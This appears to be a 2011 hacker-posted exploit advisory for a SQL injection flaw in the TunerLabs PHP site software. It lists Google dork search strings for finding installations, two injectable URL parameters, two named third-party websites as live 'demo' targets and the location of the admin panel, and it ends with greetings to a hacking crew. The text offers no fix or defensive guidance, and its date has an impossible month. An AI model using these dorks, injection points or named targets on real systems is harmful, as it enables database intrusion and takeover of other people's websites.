TunerLabs suffers from a remote SQL injection vulnerability.
45c2e3cca038017758bf5611472cc12116a50f943d8c2ca4f34140b39e1d19a4
================================================
_# _# _# _# _#_# _# _# _# _#_# _# _# _# _#_# _# _# _# _
#
# Exploit Title : TunerLabs SQL Injection Vulnerability
# Google Dork : intext:"Powered by TunerLabs"
# Date : 2011-21-09
# Author : nGa Sa Lu [ GaNgst3r ]
# Service Link : http://www.tunerlabs.com
# Tested on : Vista
# Platform : php
# _# _# _# _# _#_# _# _# _# _#_# _# _# _# _#_# _# _# _# _#
[+] Google Dork :
intext:"Powered by TunerLabs"
intext:"Creative credit - TunerLabs"
[+] Exploit
http://www.localhost.com/view-gallery.php?albmid=[SQL]
http://www.localhost.com/profile-view.php?id=[SQL]
[+] Demo
http://www.orangedwellings.com/view-gallery.php?albmid=13
http://www.awesomedesignscochin.com/view-gallery.php?albmid=3
[+] Special Give :)
As all know Admin page is the soul of site :)
http://http://www.localhost.com/ucms
^_^ G00d LUCK ALL
x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-
x Greetz to all M1rT crew, h4ckall[dot]net, 4lbora4q[dot]com bros -
x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-
x-[+] i'am -x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-
- [ dongoth ] >> [ GaNgst3r ] >> [ nGa Sa Lu ] >> x
x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-
===================================================